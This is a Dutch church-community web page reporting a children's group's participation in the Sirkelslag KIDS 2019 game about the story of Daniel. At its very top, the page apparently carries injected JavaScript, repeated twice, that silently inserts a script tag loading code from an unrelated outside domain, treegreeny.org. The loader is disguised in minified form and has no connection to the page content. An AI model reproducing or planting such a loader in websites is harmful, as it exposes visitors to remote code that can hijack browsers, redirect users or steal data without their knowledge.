;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); #sirkelslagkids2019 #jop - PKN Damwâld

#sirkelslagkids2019 #jop

Gepubliceerd op: maandag 18 november 2019

Afgelopen vrijdagavond werd er ook in Damwâld meegedaan aan Sirkelslag 2019. Sirkelslag KIDS is een spannend en interactief spel tussen kindergroepen (8-12 jaar) uit heel Nederland. Je speelt het spel gewoon vanaf je eigen locatie. Je eigen groep speelt tegen honderden andere groepen uit heel Nederland.

Het thema van Sirkelslag KIDS 2019 is ‘In het donker zoeken naar licht’. Het verhaal van Daniel loopt als rode draad door de spellen. Daniël werd in de leeuwenkuil gegooid. Maar het verhaal begint al eerder: met de verwoesting van de stad Jeruzalem door de Babyloniërs. De Israëlieten mogen niet meer in hun eigen land wonen. Ze worden in ballingschap meegenomen naar Babylonië en komen in een vreemd land waar mensen anders denken en doen. Een land waarin ze niet zichzelf kunnen zijn en zich gevangen voelen. Daniël groeit op in deze donkere tijd. Tijdens Sirkelslag maken de kinderen spelenderwijs kennis met het verhaal van Daniël.

De kinderen moesten verschillende opdrachten uitvoeren waarbij de eigenschappen: samenwerking, oplossend denken, creativiteit, snelheid en de smaakpapillen stevig op de proef werden gesteld. Alle opdrachten zijn voltooid!

UPDATE: net niet in de prijzen gevallen met onze teams. Maar daarom was het niet minder leuk!